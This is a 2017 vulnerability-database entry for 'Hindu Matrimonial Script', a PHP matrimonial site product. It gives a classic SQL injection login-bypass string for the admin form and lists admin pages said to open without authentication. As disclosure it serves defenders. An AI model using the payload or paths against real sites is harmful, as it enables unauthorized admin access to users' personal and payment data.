Admin Login Bypass & SQLi + Add/Edit

vendor:

Hindu Matrimonial Script

by:

İhsan Şencan

7,5

CVSS

HIGH

Admin Login Bypass & SQLi

CWE

Product Name: Hindu Matrimonial Script

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

2017

Admin Login Bypass & SQLi + Add/Edit

The vulnerability allows an attacker to bypass the admin login page and gain access to the admin panel of the Hindu Matrimonial Script. The attacker can also gain access to the Add/Edit pages of the script by directly entering the URL. The vulnerable script is hosted on http://www.phpmatrimonialscript.in/ and the vulnerable version is unknown.

Mitigation:

Ensure that the admin login page is properly secured and that all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Hindu Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
#
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
#
# Direct entrance Add/Edit...
# http://localhost/[PATH]/admin/usermanagement.php
# http://localhost/[PATH]/admin/countrymanagement.php
# http://localhost/[PATH]/admin/communitymanagement.php
# http://localhost/[PATH]/admin/renewaldue.php
# http://localhost/[PATH]/admin/generalsettings.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/newsletter1.php
# http://localhost/[PATH]/admin/payment.php
# http://localhost/[PATH]/admin/searchview.php
# http://localhost/[PATH]/admin/success_story.php
# http://localhost/[PATH]/admin/featured.php
# http://localhost/[PATH]/admin/photo.php
# http://localhost/[PATH]/admin/googleads.php
# http://localhost/[PATH]/admin/reports.php
# # # # #